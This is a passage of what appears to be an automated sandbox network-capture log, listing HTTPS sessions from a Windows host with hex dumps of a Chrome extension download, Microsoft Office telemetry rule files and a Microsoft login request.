2024-11-10 03:55:19 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135771 X-GUploader-UploadID: AHmUCY3dIR5RgglSvBcZyM0G_1Wwggul3xdH43coOs0YZogGzu75B-Kp6Dn45zQ16f8ikPdQsIrj6xDqCg X-Goog-Hash: crc32c=5YFIVw== Server: UploadServer Date: Sat, 09 Nov 2024 20:33:29 GMT Expires: Sun, 09 Nov 2025 20:33:29 GMT Cache-Control: public, max-age=31536000 Age: 26510 Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-10 03:55:19 UTC	805	IN	Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc Data Ascii: T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.\|A\|aGoO{\TiZQ
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: 88 1b 77 cc 06 18 f9 d1 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 Data Ascii: wxC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT\|uKCc$
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: ec 3c 53 7b bd 2b 0d f6 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 Data Ascii: <S{+H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw\|D;havxL:t$!?\3K\|_#L]{kl8Ag&0)lmhf
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: 73 be d1 73 8f fe f4 bd 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 Data Ascii: ss!3Mz0siOldC)'$Gp{C`;tequfB0DL^QbAdz=Z3)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?Brf
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: d6 92 10 e8 84 d6 9a 4c 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 Data Ascii: L((h=:G,H$t;j@0]9~9H9O"ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\UskQX[j4O,8=q/m`Cbf\|Qa79
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: ad c4 ca 60 aa 12 70 5b 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 Data Ascii: `p[{z0\|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: 58 0d 04 41 31 f1 f1 a8 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f Data Ascii: XA1TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/
2024-11-10 03:55:19 UTC	1378	IN	Data Raw: 14 0d 73 e2 64 7e de 02 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 Data Ascii: sd~v_\oiPRUk"<)1Z\|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/me

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:19 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:19 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:19 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035519Z-16547b76f7fmbrhqhC1DFWkds80000000c1000000000q6uc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:19 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:19 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:19 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035519Z-16547b76f7f9rdn9hC1DFWfk7s0000000c1g00000000dgcz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:19 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:19 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:19 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: b4d8526a-701e-005c-5649-32bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035519Z-17df447cdb5g2j9ghC1DFWuyag00000002p00000000067tg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:19 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:19 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:19 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:19 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035519Z-16547b76f7fj5p7mhC1DFWf8w40000000c6000000000cz58 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:19 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:19 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:19 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: bfca7b67-501e-005b-6e78-30d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035519Z-17df447cdb5wrr5fhC1DFWte8n00000008s000000000734z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:19 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49773	40.126.31.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
